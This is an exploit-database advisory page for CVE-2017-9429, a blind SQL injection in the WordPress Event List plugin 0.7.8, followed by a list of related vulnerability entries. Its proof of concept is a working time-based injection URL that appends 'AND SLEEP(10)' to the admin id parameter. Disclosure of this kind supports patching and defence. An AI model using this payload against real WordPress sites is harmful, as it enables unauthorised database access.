Lucene search
Dimitrios TsagkarakisEXPLOITPACK:F1BEB5778FFD33BD04FBD63766A86515HistoryJun 04, 2017 - 12:00 a.m.
WordPress Plugin Event List 0.7.8 - SQL Injection
2017-06-0400:00:00
Dimitrios Tsagkarakis
7
0.001 Low
EPSS
Percentile
46.8%
WordPress Plugin Event List 0.7.8 - SQL Injection
# Exploit Title: WordPress Plugin Event List <= 0.7.8 - SQL Injection
# Date: 04-06-2017
# Exploit Author: Dimitrios Tsagkarakis
# Website: dtsa.eu
# Software Link: https://wordpress.org/plugins/event-list/
# Version: 0.7.8
# CVE : CVE-2017-9429
# Category: webapps
1. Description:
SQL injection vulnerability in the Event List plugin 0.7.8 for WordPress
allows an authenticated user to execute arbitrary SQL commands via the id
parameter to wp-admin/admin.php.
2. Proof of Concept:
http://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&action=edit&id
=1 AND SLEEP(10)
3. Solution:
The plugin has been removed from WordPress. Deactivate the plug-in and wait
for a hotfix.
4. Reference:
http://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-inje
ction-sqli/
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429Related
packetstorm
packetstorm
WordPress Event List 0.7.8 SQL Injection
2017-06-13 00:00:00
nvd
nvd
CVE-2017-9429
2017-06-13 18:29:00
cve
cve
CVE-2017-9429
2017-06-13 18:29:00
patchstack
patchstack
WordPress Event List plugin <=0.7.8 - SQL Injection vulnerability
2017-06-04 00:00:00
zdt
zdt
WordPress Event List Plugin <= 0.7.8 - SQL Injection Vulnerability
2017-06-14 00:00:00
wpvulndb
wpvulndb
Event List <= 0.7.8 - Authenticated SQL Injection
2017-06-04 00:00:00
prion
prion
Sql injection
2017-06-13 18:29:00
cvelist
cvelist
CVE-2017-9429
2017-06-13 18:00:00
exploitdb
exploitdb
WordPress Plugin Event List < 0.7.8 - SQL Injection
2017-06-04 00:00:00